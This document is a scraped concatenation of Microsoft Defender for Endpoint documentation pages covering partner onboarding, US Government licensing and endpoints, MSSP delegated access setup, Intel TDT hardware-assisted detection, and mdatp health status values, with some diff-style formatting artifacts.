------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Become a Microsoft Defender for Endpoint partner
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-To become a Defender for Endpoint solution partner, complete steps outlined in this article.
-
-## Step 1: Subscribe to a Microsoft Defender for Endpoint license
-
-Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink). Subscribing allows you to use a Microsoft Defender for Endpoint tenant with up to three devices to developing solutions that integrate with Microsoft Defender for Endpoint.
-
-## Step 2: Fulfill the solution validation and certification requirements
-
-The best way for technology partners to certify that their integration works is to have a joint customer approve the suggested integration design in the [Partner Application page](https://security.microsoft.com/interoperability/partnersapps) in Microsoft Defender XDR and have it tested and demoed to the Microsoft Defender for Endpoint team.
-
-Once the Microsoft Defender for Endpoint team reviews and approves the integration, we direct you to be included as a partner at the Microsoft Intelligent Security Association.
-
-## Step 3: Get listed in the Microsoft Defender for Endpoint partner application portal
-
-Microsoft Defender for Endpoint supports non-Microsoft applications discovery and integration using the in-product [partner page](partner-applications.md) that is embedded within the Microsoft Defender for Endpoint management portal.
-
-To have your company listed as a partner in the in-product partner page, provide the following information:
--- A square logo (SVG)-- Name of the product to be presented-- A 15-word product description-- A link to the landing page for the customer to complete the integration or blog post that includes sufficient information for customers. Any press release including the Microsoft Defender for Endpoint product name should be reviewed by the marketing and engineering teams. Wait for at least 10 days for the review process to be done.-- If you use a multi-tenant Microsoft Entra ID approach, we need the Microsoft Entra application name to track usage of the application.-- The User-Agent field in each API call to the Defender for Endpoint public set of APIs or Graph Security APIs. This is used for statistical purposes, troubleshooting, and partner recognition. In addition, this step is a requirement for membership in Microsoft Intelligent Security Association (MISA).-
- Follow these steps:
-
- - Set the User-Agent field in each HTTP request header to the below format.
-
- ```http
- MdePartner-{CompanyName}-{ProductName}/{Version}
- ```
-
- For example, User-Agent:
-
- ```http
- MdePartner-Contoso-ContosoCognito/1.0.0
- ```
-
- - For more information, see [RFC 2616 section-14.43](https://tools.ietf.org/html/rfc2616#section-14.43).
-
-Partnerships with Microsoft Defender for Endpoint help our mutual customers to further streamline, integrate, and orchestrate defenses. Thank you for choosing to become a Microsoft Defender for Endpoint partner and to achieve our common goal of effectively protecting customers and their assets by preventing and responding to modern threats together.
-
-## MISA nomination
-
-Managed security service providers (MSSP) and independent software vendors (ISV) can be nominated to the Microsoft Intelligent Security Association (MISA). For more information, see [MISA information page](https://www.microsoft.com/security/business/intelligent-security-association).
--
-## Related articles
--- [Technical partner opportunities](partner-integration.md)-
security Gov https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/gov.md
- Title: Microsoft Defender for Endpoint for US Government customers
-description: Learn about the Microsoft Defender for Endpoint for US Government customers requirements and capabilities available
---- Previously updated : 11/29/2023---- m365-security-- tier3---
-# Microsoft Defender for Endpoint for US Government customers
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Microsoft Defender for Endpoint for US Government customers, built in the Azure US Government environment, uses the same underlying technologies as Defender for Endpoint in Azure Commercial.
-
-This offering is available to GCC, GCC High, and DoD customers and is based on the same prevention, detection, investigation, and remediation as the commercial version. However, there are some differences in the availability of capabilities for this offering.
-
-> [!NOTE]
-> If you are a GCC customer using Defender for Endpoint in Commercial, please refer to the public documentation pages.
-
-## Licensing requirements
-
-Microsoft Defender for Endpoint for US Government customers requires one of the following Microsoft volume licensing offers:
-
-### Desktop licensing
-
-|GCC|GCC High|DoD|
-||||
-|Microsoft 365 GCC G5|Microsoft 365 E5 for GCC High|Microsoft 365 G5 for DOD|
-|Microsoft 365 G5 Security GCC|Microsoft 365 G5 Security for GCC High|Microsoft 365 G5 Security for DOD|
-|Microsoft Defender for Endpoint - GCC|Microsoft Defender for Endpoint for GCC High|Microsoft Defender for Endpoint for DOD|
-|Windows 10 Enterprise E5 GCC|Windows 10 Enterprise E5 for GCC High|Windows 10 Enterprise E5 for DOD|
-
-### Server licensing
-
-|GCC|GCC High|DoD|
-||||
-|Microsoft Defender for Endpoint Server GCC|Microsoft Defender for Endpoint Server for GCC High|Microsoft Defender for Endpoint Server for DOD|
-|Microsoft Defender for servers|Microsoft Defender for servers - Government|Microsoft Defender for servers - Government|
-
-## Portal URLs
-
-The following are the Microsoft Defender for Endpoint portal URLs for US Government customers:
--
-|Customer type|Portal URL|
-|||
-|GCC|<https://security.microsoft.com>|
-|GCC High|<https://security.microsoft.us>|
-|DoD|<https://security.apps.mil>|
-
-> [!NOTE]
-> If you are a GCC customer and in the process of moving from Microsoft Defender for Endpoint commercial to GCC, use https://transition.security.microsoft.com to access your Microsoft Defender for Endpoint commercial data.
-
-## Endpoint versions
-
-### Standalone OS versions
-
-The following OS versions are supported:
--
-OS version|GCC|GCC High|DoD
-:|::|::|::
-Windows 11|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 10, version 21H1 and above|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 10, version 20H2 (with [KB4586853](https://support.microsoft.com/help/4586853) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 10, version 2004 (with [KB4586853](https://support.microsoft.com/help/4586853) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-version-2004-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-version-2004-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-version-2004-end-of-servicing), please upgrade
-Windows 10, version 1909 (with [KB4586819](https://support.microsoft.com/help/4586819) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1909-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1909-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1909-end-of-servicing), please upgrade
-Windows 10, version 1903 (with [KB4586819](https://support.microsoft.com/help/4586819) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1903-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1903-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1903-end-of-servicing), please upgrade
-Windows 10, version 1809 (with [KB4586839](https://support.microsoft.com/help/4586839) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade
-Windows 10, version 1803 (with [KB4598245](https://support.microsoft.com/help/4598245) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade|![Yes](media/svg/check-yes.svg) <br /> Note: [Deprecated](/lifecycle/announcements/windows-10-1803-1809-end-of-servicing), please upgrade
-Windows 10, version 1709|![No.](media/svg/check-no.svg) <br /> Note: Won't be supported|![Yes](media/svg/check-yes.svg) With [KB4499147](https://support.microsoft.com/help/4499147) <sup>1</sup> <br /> Note: [Deprecated](/lifecycle/announcements/revised-end-of-service-windows-10-1709), please upgrade|![No](media/svg/check-no.svg) <br /> Note: Won't be supported
-Windows 10, version 1703 and earlier|![No.](media/svg/check-no.svg) <br /> Note: Won't be supported|![No](media/svg/check-no.svg) <br /> Note: Won't be supported|![No](media/svg/check-no.svg) <br /> Note: Won't be supported
-Windows Server 2022|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2019 (with [KB4586839](https://support.microsoft.com/help/4586839) <sup>1</sup>)|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2016 (Modern) <sup>2</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2012 R2 (Modern) <sup>2</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2016 (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2012 R2 (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2008 R2 SP1 (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 8.1 Enterprise (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 8 Pro (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 7 SP1 Enterprise (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows 7 SP1 Pro (Legacy) <sup>3</sup>|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Linux|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-macOS|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Android|![Yes.](media/svg/check-yes.svg) <br /> |![Yes](media/svg/check-yes.svg) <br /> |![Yes](media/svg/check-yes.svg) <br />
-iOS|![Yes.](media/svg/check-yes.svg) <br /> |![Yes](media/svg/check-yes.svg) <br /> |![Yes](media/svg/check-yes.svg) <br />
-
-**Footnotes**
-
- <sup>1</sup> The patch must be deployed prior to device onboarding in order to configure Defender for Endpoint to the correct environment.
-
- <sup>2</sup> Learn about the [unified modern solution for Windows 2016 and 2012 R2](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution). If you have previously onboarded your servers using MMA, follow the guidance provided in [Server migration](server-migration.md) to migrate to the new solution.
-
- <sup>3</sup> When using [Microsoft Monitoring Agent](onboard-downlevel.md#install-and-configure-microsoft-monitoring-agent-mma) you'll need to choose "Azure US Government" under "Azure Cloud" if using the [setup wizard](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-setup-wizard), or if using a [command line](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-command-line) or a [script](/azure/log-analytics/log-analytics-windows-agents#install-agent-using-dsc-in-azure-automation) - set the "OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1. </br>
- The minimum MMA supported version is 10.20.18029 (March 2020).
-
-### OS versions when using Microsoft Defender for servers
-
-The following OS versions are supported when using [Microsoft Defender for servers](/azure/security-center/security-center-wdatp):
--
-OS version|GCC|GCC High|DoD
-:|::|::|::
-Windows Server 2022|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2019|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2016|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2012 R2|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-Windows Server 2008 R2 SP1|![Yes.](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)
-
-## Required connectivity settings
-
-If a proxy or firewall is blocking all traffic by default and allowing only specific domains through, add the domains listed in the downloadable sheet to the allowed domains list.
-
-The following downloadable spreadsheet lists the services and their associated URLs your network must be able to connect to. Verify there are no firewall or network-filtering rules that would deny access to these URLs, or create an *allow* rule specifically for them.
--
-| Spreadsheet of domains list | Description |
-|||
-| Microsoft Defender for Endpoint URL list for commercial customers | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. <br/><br/> [Download the spreadsheet here.](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx) |
-| Microsoft Defender for Endpoint URL list for Gov/GCC/DoD | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. <br/><br/> [Download the spreadsheet here.](https://download.microsoft.com/download/6/e-urls-gov.xlsx) |
-
-For more information, see [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md).
-
-> [!NOTE]
-> The spreadsheet contains commercial URLs as well, make sure you check the "US Gov" tabs.
->
-> When filtering, look for the records labeled as "US Gov" and your specific cloud under the geography column.
-
-## API
-
-Instead of the public URIs listed in our [API documentation](apis-intro.md), you'll need to use the following URIs:
--
-|Endpoint type|GCC|GCC High & DoD|
-||||
-|Login|`https://login.microsoftonline.com`|`https://login.microsoftonline.us`|
-|Defender for Endpoint API|`https://api-gcc.securitycenter.microsoft.us`|`https://api-gov.securitycenter.microsoft.us`|
-
-## Feature parity with commercial
-
-Defender for Endpoint for US Government customers doesn't have complete parity with the commercial offering. While our goal is to deliver all commercial features and functionality to our US Government customers, there are some capabilities not yet available we want to highlight.
-
-These are the known gaps:
-
-|Feature name|GCC|GCC High|DoD|
-||::|::|::|
-|Microsoft Secure Score|![Yes](media/svg/check-yes.svg)<sup>1</sup>|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Microsoft Threat Experts|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-|Microsoft Defender for Endpoint Security Configuration Management|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|![No](media/svg/check-no.svg)|
-
-> [!NOTE]
-> <sup>1</sup> While Microsoft Secure Score is available for GCC customers, there are some security recommendations that aren't available.
-
-These are the features and known gaps for [Mobile Threat Defense (Microsoft Defender for Endpoint on Android & iOS)](mtd.md):
-
-|Feature name|GCC|GCC High|DoD|
-||::|::|::|
-|Reports: Web content filtering|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Reports: Device health|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Web Protection (Anti-Phishing and custom indicators)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Malware Protection (Android-Only)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Jailbreak Detection (iOS-Only)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Conditional Access/Conditional Launch|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Support for MAM|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Privacy Controls|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Microsoft Defender Vulnerability Management core capabilities <br/> (included in Defender for Endpoint Plan 2) |![Yes](media/svg/check-yes.svg) <sup>1</sup>|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-|Microsoft Defender Vulnerability Management premium capabilities |![Yes](media/svg/check-yes.svg) <sup>1</sup>|![Yes](media/svg/check-yes.svg)|![Yes](media/svg/check-yes.svg)|
-
-> [!NOTE]
->
-> <sup>1</sup> The Defender Vulnerability Management Report inaccuracy functionality is not available for GCC customers.
-
security Grant Mssp Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/grant-mssp-access.md
- Title: Grant access to managed security service provider (MSSP)
-description: Take the necessary steps to configure MSSP integration with the Microsoft Defender for Endpoint.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Grant managed security service provider (MSSP) access (preview)
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mssp-support-abovefoldlink)
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-To implement a multitenant delegated access solution, take the following steps:
-
-1. Enable [role-based access control](rbac.md) in Defender for Endpoint and connect with Active Directory (AD) groups.
-
-2. Configure [Governance Access Packages](/azure/active-directory/governance/identity-governance-overview) for access request and provisioning.
-
-3. Manage access requests and audits in [Microsoft Myaccess](/azure/active-directory/governance/entitlement-management-request-approve).
-
-## Enable role-based access controls in Microsoft Defender for Endpoint
-
-1. **Create access groups for MSSP resources in Customer AAD: Groups**
-
- These groups are linked to the Roles you create in Defender for Endpoint. To do so, in the customer AD tenant, create three groups. In our example approach, we create the following groups:
-
- - Tier 1 Analyst
- - Tier 2 Analyst
- - MSSP Analyst Approvers
-
-2. Create Defender for Endpoint roles for appropriate access levels in Customer Defender for Endpoint.
-
- To enable RBAC in the customer Microsoft Defender portal, access **Settings > Endpoints > Permissions > Roles** and "Turn on roles", from a user account with Global Administrator or Security Administrator rights.
-
- Then, create RBAC roles to meet MSSP SOC Tier needs. Link these roles to the created user groups via "Assigned user groups".
-
- Two possible roles:
-
- - **Tier 1 Analysts**
-
- Perform all actions except for live response and manage security settings.
-
- - **Tier 2 Analysts**
-
- Tier 1 capabilities with the addition to [live response](live-response.md)
-
- For more information, see [Use role-based access control](rbac.md).
-
-## Configure Governance Access Packages
-
-1. **Add MSSP as Connected Organization in Customer AAD: Identity Governance**
-
- Adding the MSSP as a connected organization allows the MSSP to request and have accesses provisioned.
-
- To do so, in the customer AD tenant, access Identity Governance: Connected organization. Add a new organization and search for your MSSP Analyst tenant via Tenant ID or Domain. We suggest creating a separate AD tenant for your MSSP Analysts.
-
-2. **Create a resource catalog in Customer AAD: Identity Governance**
-
- Resource catalogs are a logical collection of access packages, created in the customer AD tenant.
-
- To do so, in the customer AD tenant, access Identity Governance: Catalogs, and add **New Catalog**. In our example, it's called, **MSSP Accesses**.
-
- :::image type="content" source="media/goverance-catalog.png" alt-text="The new catalog page" lightbox="media/goverance-catalog.png":::
-
- Further more information, see [Create a catalog of resources](/azure/active-directory/governance/entitlement-management-catalog-create).
-
-3. **Create access packages for MSSP resources Customer AAD: Identity Governance**
-
- Access packages are the collection of rights and accesses that a requestor is granted upon approval.
-
- To do so, in the customer AD tenant, access Identity Governance: Access Packages, and add **New Access Package**. Create an access package for the MSSP approvers and each analyst tier. For example, the following Tier 1 Analyst configuration creates an access package that:
-
- - Requires a member of the AD group **MSSP Analyst Approvers** to authorize new requests
- - Has annual access reviews, where the SOC analysts can request an access extension
- - Can only be requested by users in the MSSP SOC Tenant
- - Access auto expires after 365 days
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/new-access-package.png" alt-text="The New access package page" lightbox="media/new-access-package.png":::
-
- For more information, see [Create a new access package](/azure/active-directory/governance/entitlement-management-access-package-create).
-
-4. **Provide access request link to MSSP resources from Customer AAD: Identity Governance**
-
- The My Access portal link is used by MSSP SOC analysts to request access via the access packages created. The link is durable, meaning the same link may be used over time for new analysts. The analyst request goes into a queue for approval by the **MSSP Analyst Approvers**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="media/access-properties.png" alt-text="The Properties page" lightbox="media/access-properties.png":::
-
- The link is located on the overview page of each access package.
-
-## Manage access
-
-1. Review and authorize access requests in Customer and/or MSSP myaccess.
-
- Access requests are managed in the customer My Access, by members of the MSSP Analyst Approvers group.
-
- To do so, access the customer's myaccess using: `https://myaccess.microsoft.com/@<Customer Domain>`.
-
- Example: `https://myaccess.microsoft.com/@M365x440XXX.onmicrosoft.com#/`
-
-2. Approve or deny requests in the **Approvals** section of the UI.
-
- At this point, analyst access has been provisioned, and each analyst should be able to access the customer's Microsoft Defender portal: `https://security.microsoft.com/?tid=<CustomerTenantId>`
-
-## Related topics
--- [Access the MSSP customer portal](access-mssp-portal.md)-- [Configure alert notifications](configure-mssp-notifications.md)-- [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security Hardware Acceleration And Mdav https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/hardware-acceleration-and-mdav.md
- Title: Hardware acceleration and Microsoft Defender Antivirus.
-description: How Microsoft Defender Antivirus incorporates hardware acceleration and Microsoft Defender Antivirus.
------ Previously updated : 02/26/2024----
-# Hardware acceleration and Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-**Platforms:**
--- Windows 11, Windows 10-
-**Known limitations:**
--- Intel TDT doesn't support processors designated as servers.-- Multi-level virtualization isn't currently supported.-- Windows Server workloads aren't supported.-- Windows clients running on Xeon processors aren't supported due to Intel Xeon processors not supporting Intel TDT functionality.-
-## Microsoft Defender Antivirus (MDAV) and Intel Threat Detection Technology (TDT)
-
-This table shows the Intel TDT technologies Microsoft collaborated with Intel on to provide security while also balancing performance:
-
-|Available since |Intel TDT technology | Intel Threat Detection Technology (TDT) available on|
-|:|:|:|
-|2018|Intel TDT ΓÇô Accelerated Memory Scanning (AMS)|Intel integrated graphic 6th Gen Core (circa 2015) or newer family of processors, running on laptops, tablets, and desktop systems.|
-|2021|Intel TDT - Cryptojacking detector| Intel 6th Gen Core (circa 2015) or newer family of processors, running on laptops, tablets, and desktop systems.|
-|2022|Intel TDT - Ransomware detector| Intel 8th Gen Core or newer family of processors.|
-
-**Intel Threat Detection Technology (TDT) - Accelerated Memory Scanning (AMS):** Introduced extra memory scanning capabilities to detect fileless attacks that are expensive on the Central Processing Unit (CPU), and then offload them to the integrated Graphics Processor Unit (integrated GPU). Two benefits are:
--- lower CPU consumption-- A reduction of System-on-a-chip (SoC) power consumption leading to longer battery life on laptops and tablets-
-**Intel Threat Detection Technology (TDT) - Cryptojacking:** Enhanced detection by leveraging IntelΓÇÖs Central Processing Unit (CPU) performance monitoring unit (PMU) and offloading to the integrated Graphics Processor Unit (integrated GPU) to detect the malware code execution (fingerprint) of repeated mathematical operations at runtime. The signals are processed by a layer of machine learning with minimal overhead.
-
-### How do you enable Intel TDT AMS or Cryptojacking integration?
-
-Enabled by default when Microsoft Defender Antivirus is running.
-
-### What do the detections show up as?
-
-The regular Microsoft Defender Antivirus Event ID **1116**.
-
-### What type of attacks does it help with?
--- We use the Intel TDT - Cryptojacking detector to thwart various cryptojacking mallards. The following Coinminer campaigns were successfully detected and blocked using the TDT Cryptojacking detector: [YouTube Pirated Software Videos Deliver Triple Threat: Vidar Stealer, LaPlasa Clipper, XMRig Miner](https://www.fortinet.com/blog/threat-research/youtube-pirated-software-videos-deliver-triple-threat-vidar-stealer-laplas-clipper-xmrig-miner)--- We use the Intel TDT detector to identify instances of CryptoJacking malware abusing Windows binaries (lolbins), and then employ Defender behavior monitoring to prevent and block such activities effectively. For more information, see [Hardware-based threat defense against increasingly complex cryptojackers](https://www.microsoft.com/security/blog/2022/08/18/hardware-based-threat-defense-against-increasingly-complex-cryptojackers/).-
-## Related articles
--- [Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT: A Case Study](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-against-ransomware-with-microsoft-defender-for/ba-p/3243941).
security Health Status https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/health-status.md
- Title: Investigate agent health issues
-description: Learn about the values returned when running the mdatp health command
------- m365-security-- tier3-- Previously updated : 05/06/2021--
-# Investigate agent health issues
---- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-The following table provides information on the values returned when you run the `mdatp health` command and their corresponding descriptions.
-
-|Value|Description|
-|||
-|automatic_definition_update_enabled|True if automatic antivirus definition updates are enabled, false otherwise.|
-|cloud_automatic_sample_submission_consent|Current sample submission level. Can be one of the following values: <ul><li>**None**: No suspicious samples are submitted to Microsoft.</li><li>**Safe**: Only suspicious samples that don't contain personally identifiable information (PII) are submitted automatically. This is the default value for this setting.</li><li>**All**: All suspicious samples are submitted to Microsoft.</li></ul>|
-|cloud_diagnostic_enabled|True if optional diagnostic data collection is enabled, false otherwise. For more information related to Defender for Endpoint and other products and services like Microsoft Defender Antivirus and Windows, see [Microsoft Privacy Statement](https://go.microsoft.com/fwlink/?linkid=827576).|
-|cloud_enabled|True if cloud-delivered protection is enabled, false otherwise.|
-|conflicting_applications|List of applications that are possibly conflicting with Microsoft Defender for Endpoint. This list includes, but isn't limited to, other security products and other applications known to cause compatibility issues.|
-|definitions_status|Status of antivirus definitions.|
-|definitions_updated|Date and time of last antivirus definition update.|
-|definitions_updated_minutes_ago|Number of minutes since last antivirus definition update.|
-|definitions_version|Antivirus definition version.|
-|edr_client_version|Version of the EDR client running on the device.|
-|edr_configuration_version|EDR configuration version.|
-|edr_device_tags|List of tags associated with the device.|
-|edr_group_ids|Group ID that the device is associated with.|
-|edr_machine_id|Device identifier used in Microsoft Defender XDR.|
-|engine_version|Version of the antivirus engine.|
-|healthy|True if the product is healthy, false otherwise.|
-|licensed|True if the device is onboarded to a tenant, false otherwise.|
-|log_level|Current log level for the product.|
-|machine_guid|Unique machine identifier used by the antivirus component.|
-|network_protection_status|Status of the network protection component (macOS only). Can be one of the following values: <ul><li>**starting** - Network protection is starting</li><li>**failed_to_start** - Network protection couldn't be started due to an error</li><li>**started** - Network protection is currently running on the device</li><li>**restarting** - Network protection is currently restarting</li><li>**stopping** - Network protection is stopping</li><li>**stopped** - Network protection isn't running</li></ul>|
-|org_id|Organization that the device is onboarded to. If the device isn't yet onboarded to any organization, this prints unavailable. For more information on onboarding, see [Onboard to Microsoft Defender for Endpoint](onboarding.md).|
-|passive_mode_enabled|True if the antivirus component is set to run in passive mode, false otherwise.|
-|product_expiration|Date and time when the current product version reaches end of support.|
-|real_time_protection_available|True if the real-time protection component is healthy, false otherwise.|
-|real_time_protection_enabled|True if real-time antivirus protection is enabled, false otherwise.|
-|real_time_protection_subsystem|Subsystem used to serve real-time protection. If real-time protection isn't operating as expected, this prints unavailable.|
-|release_ring|Release ring. For more information, see [Deployment rings](deployment-rings.md).|
-
-## Component specific health
-
-You can get more detailed health information for different Defender's features with `mdatp health --details <feature>`. For example:
-
-```bash
-mdatp health --details edr
-
-edr_early_preview_enabled : "disabled"
-edr_device_tags : []
-edr_group_ids : ""
-edr_configuration_version : "20.199999.main.2022.10.25.03-514032a834557bdd31ac415be6df278d9c2a4c25"
-edr_machine_id : "a47ba049f43319ac669b6291ce73275cd445c9cd"
-edr_sense_guid : "298a1a8c-04dd-4929-8efd-3bb14cb54b94"
-edr_preferred_geo : "unitedstates"
-```
-
-You can run `mdatp health --help` on recent versions to list all supported `feature`s.
security Host Firewall Reporting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/host-firewall-reporting.md
- Title: Host firewall reporting in Microsoft Defender for Endpoint
